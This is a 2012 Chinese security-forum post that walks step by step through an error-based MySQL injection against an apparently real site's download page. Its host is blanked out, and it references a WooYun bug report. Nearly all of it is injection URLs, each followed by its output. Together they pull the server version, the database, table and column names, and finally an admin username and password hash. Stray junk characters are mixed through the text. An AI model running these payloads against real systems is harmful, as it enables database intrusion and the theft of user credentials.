找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1930|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666$ f( g) ^0 I1 L% t  w/ E, F( T
. k& ?5 |) d5 q
之前想找个测试 没想到这有 可以测试下做个记录而已 : f: l. u* {1 e. w/ T' |
% k2 u. }& Q* \  Z6 h5 c
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
0 A. L& {2 h+ d/ r$ s0 `4 N6 C: G, _
/data0/htdocs/leqi_new/app/myapp.php7 b% L* a/ a1 b% E

4 b5 {3 @3 n% a4 t6 m) S! u 或者
' f# @; M" F3 D- t) X
1 h$ j( R6 w, l* I& A/**********version()**********/ 5.1.49-log- x2 P8 R# [" q0 F- ?, q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 l; s$ y5 P3 I7 |

1 t* h: g( }+ S( W: f0 b2 ~/**********user()**********/  
5 ^) \$ e# J3 z. f$ o  g5 ]5 jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. z0 ~& x8 V0 Q2 @* c0 T$ {

5 i0 N7 B! _/ f1 C" K2 U( P; N/**********database()**********/  leqi
5 J4 b& t7 q1 c6 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* `" I' y$ S% Z  d  I7 U

6 G# Y' p4 j8 @  A/ @/**********limit依次递归爆库**********/! B  _- _5 M/ y: r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) Z( {1 U" c- T% o8 d. ]
information_schema/ ]/ M4 z' d; ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ Y0 r4 B% B: t" M+ P& ~0 u& a
leqi
9 E# F! p/ g: ?% f& d" uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- J& i" a; ^2 [4 n5 o9 L0 `1 W2 ~
test$ h( y- i2 V3 ~2 w

2 W' a) u% ^. H1 p& c1 V2 A3 a/**********limit依次递归爆表名**********/2 d4 n0 u) q5 w) ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 f. K6 s8 E' O- {
users. A/ N! ~8 r7 @7 p7 j) k
6 s( R. d' L$ p& V' R; g! n, @( _
/**********limit依次递归爆字段名**********/
1 F3 v% {4 `, w$ I, ]http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 c% n9 G' B" V9 u
user_id,username,nickname,passwd,group_id
/ Q2 K( [& w) o6 ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" [, w/ v+ V" M0 ?- P
/wapc/5000_0005_003
; j6 j7 s. m! X& W) I  L1 b2 E( v11 21
4 x# w* w, u6 h" D2 dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. s3 U! P2 @/ U4 Y
/wapc/5000_0005_003
  \9 y" C. A+ q2 v$ z' K& v11 341 351 361# a/ }6 K" t6 d# ^
/**********爆数据**********/
3 B! f" m; O. I' n* w0 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! V  S8 S. I$ f6 Madmin0 z! a/ \0 R* h( z, U! ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ N0 @. w- a7 ^4 n+ G. E
6a8b4574ca231eb8bd52764d4978ffcd
- H, }0 b$ X9 H4 w4 w% c
$ P1 B& H% b) `' [6 u8 y) ~ 6 w( B) c) M  {+ F- n) w6 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表